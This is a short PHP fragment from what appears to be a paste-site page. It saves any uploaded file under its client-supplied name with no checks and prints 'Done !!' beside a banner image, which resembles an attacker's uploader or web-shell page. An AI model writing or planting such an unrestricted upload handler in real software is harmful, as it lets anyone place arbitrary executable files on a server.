- if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<p align="center"><font face="Verdana"
- size="1"><font color="white"> Done !!</font><br>'; }
- else { echo '<font color="#FF0000">Failed :( </font></p>
- </td></table></tr>
- '; }
- }
- }}
- ?>
- <center>
- <img src='http://images.cooltext.com/4117878.gif'>
Add Comment
Please, Sign In to add comment